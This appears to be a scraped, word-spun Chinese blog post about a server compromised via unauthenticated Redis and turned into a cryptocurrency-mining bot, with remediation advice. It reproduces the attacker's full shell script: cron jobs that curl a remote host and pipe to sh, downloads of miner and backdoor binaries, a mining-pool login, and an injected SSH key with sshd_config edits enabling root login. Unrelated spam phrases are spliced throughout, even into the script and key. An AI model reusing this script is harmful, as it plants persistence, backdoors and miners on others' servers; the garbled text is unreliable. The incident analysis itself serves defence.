牛肉面,传奇再现,北宋-菊茶栽培和品鉴中心,让传统传承

admin 3个月前 ( 05-29 01:55 ) 0条评论
摘要: 朋友的一个项目说接到阿里云的告警,提示服务器已沦为肉鸡。网络带宽被大量占用,网站访问很慢,通过SSH远程管理服务器还频繁断开链接。...

朋友的一个项目说接到阿里云的告警,提示服务器已沦为肉鸡,网络带异界基本法宽被很多占用,网站拜访很慢,经过SSH长途管理服务器还频频断开链接。朋友不知怎样下手,便约请我帮助处理。

阿里云的安全告警邮件内容:

在没有查到反常进程之前我是先把操作系统的带宽&端口用iptables 做了约束这样能保证我能长途操作服务器才干查找原因.

在各种netstat –ntlp 的查看下没有任何反常。在top 下查到了有反常进程 还有些反常的这儿就截图一个:

成果决断把进程给kill -9 了 没想到再去ps的时分又来了 意思便是会主动发动它。

这就让我想到了crond 这个主动使命果不其然 /var/sprool/cron/root 这个文件被人做了四肢 而且是二进制的,决断又给删去了,认为这下没事了成果过了两分钟这个文件又来这个就引起我主要了联想到了是不是有阐明看护进程了 这样的工作肯定是有看护进程在才会发作的了。所以我去百度了下 jyam -c x -M stratum+tcp 果不其然 的确有这样的进犯,这个进犯是由于redis 未授权登陆缝隙引起导致黑客运用的。

缝隙概述

Redis 默许情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务露出到公网上,假如在没有敞开认证的情况下,能够导致恣意用户在能够拜访方针服务器的情况下未授权访 问Redis以及读取Redis的数据。进犯者在未授权拜访Redis的情况下能够运用Redis的相宋罡昀关办法,能够成功将自己的公钥写入方针服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进后妈视频而能够直接登录方针服务器。

缝隙描绘

Redis 安全模型的观念是: “请不要将Redis露出在揭露网络中,钟政涛 由于让不受信赖的客户接触到Redis是十分风险的” 。

Redis 作者之所以抛弃处理未授权拜访导致的不安全性是由于, 99.99%运用Redis云门店收银机的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规矩的一起也增加了复杂性, 尽管这个问题的并不是不能处理的, 可是这在他的规划哲学中仍是不划算的。

由于其他受信赖用户需求运用Redis或许由于运维人员的忽略等原因,部分Redis 绑定在0.0.0.0:6379,而且没有敞开认证(这是Redis的默许装备),假如没有进行选用相关的战略,比方增加防火墙规矩防止其他非信赖来历 ip拜访等,将会导致Redis服务直接露出在公网上,导致其他用户能够直接在非授权doubles~刑警二人组情况下直接拜访Redis服务并进行相关操作。

运用Redis本身的相关办法,能够进行写还珠之雍正回魂文件操作,进犯者能够成功将自己的公钥写入方针服务器的 /r唐唐嘻游路oot/.ssh 文件夹的authotrized_keys 文件中,从而能够直接登录方针服务器。 (导致能够履行任何操作)

缝隙影响

Redis 露出在公网(种族改变待定怎样撤销即绑定在0.0.0.0:6379,方针IP公网可拜访),而且没有敞开相关认证和增加相关安全战略情况下可受影响而导致被运用。

在网上我查到这个被黑客编译成二进制的源文件代码 (关于redis 未授权登陆安全措施:

1 装备bind选项, 约束能够衔接Redis服务器的IP, 并修正redis的默许端口6379. 防火墙操控好答应IP衔接就好

2 装备AUTH, 设置暗码, 暗码会以明文办法保存在redis装备文件中.

3 装备rename-command CONFIG "RENAME_CONFIG", 这样即便存在未授权拜访, 也能够给进犯者运用config指令加大难度

4是Redis作者表明将会开发”real user”,区别普通用户和admin权限,普通用户将会被制止运转某些指令,如config

)

##网胸吧上查到脚本内容大致如下

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep yam || /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr" >> /var/spool/cron/root
echo "*/5 * * * * ps auxf | grep -v grep | grep gg3lady || nohup /opt/gg3lady &" >> /var/spool/cron/root

p牛肉面,传奇再现,北宋-菊茶培养和品鉴中心,让传统传承s auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr &

if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAAD盲派三刀绝学AQABAAABAQCzwg/9uDOWK牛肉面,传奇再现,北宋-菊茶培养和品鉴中心,让传统传承wwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1牛肉面,传奇再现,北宋-菊茶培养和品鉴中心,让传统传承JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405张德邻简历PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkW初中女生的胸部o0L4aR7xBlAdY牛肉面,传奇再现,北宋-菊茶培养和品鉴中心,让传统传承7vRnrvFav root" > 奉仕~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/宿舍hsshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/s报刊文摘电子版shd restart
fi

if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x牛肉面,传奇再现,北宋-菊茶培养和品鉴中心,让传统传承 -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDH牛肉面,传奇再现,北宋-菊茶培养和品鉴中心,让传统传承mrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:x@xmr.crypto-pool.fr:6666/xmr
fi

if [ ! -f "/opt/gg3lady" ]; then
curl 性感卡通-f -L https://r.chanstring.com/api/download/gg3lady_`uname -i` -o /opt/gg3lady
chmod +x /opt/gg3lady
fi

#牛肉面,传奇再现,北宋-菊茶培养和品鉴中心,让传统传承 yam=$(ps auxf | grep yam | grep -v grep | wc -l)
# gg3lady=$(ps auxf | grep gg3lady | grep -v grep | wc -l)
# cpu=$(cat /proc/cpuinfo | grep processor | wc -l)

# curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg3lady=$gg3lady\&arch=`uname -i`

所以总算找到源头了,

下面咱们来剖析下这个脚本

整个脚本的大致就这样

处理办法只要把 /var/spool/cron/r冈崎花江oot 删去 /opt/yam/yam 删去 /opt/gg3lady 删去 .ssh/KHK75NEOiq 删去

把gg3lady yam 进程完毕 还有便是sshd_confg 文件复原 应该就没问题了。可是为了安全起见仍是期望重装服务器,不保证他人不留其他的缝隙

对应的安全处理:

1、约束R后宫上位记edis的拜访IP,如指定本地IP获指定特定IP能够拜访。

2、假如是本地拜访和运用,翻开防火墙(阿里云等操作系统,默许把防火墙关了),不敞开Redis端口,最好修正掉Redis的默许端口;

3、假如要长途拜访,给Redis装备上授权拜访暗码;

文章版权及转载声明:

作者:admin本文地址:http://www.judefans.com/articles/1520.html发布于 3个月前 ( 05-29 01:55 )
文章转载或复制请以超链接形式并注明出处菊茶栽培和品鉴中心,让传统传承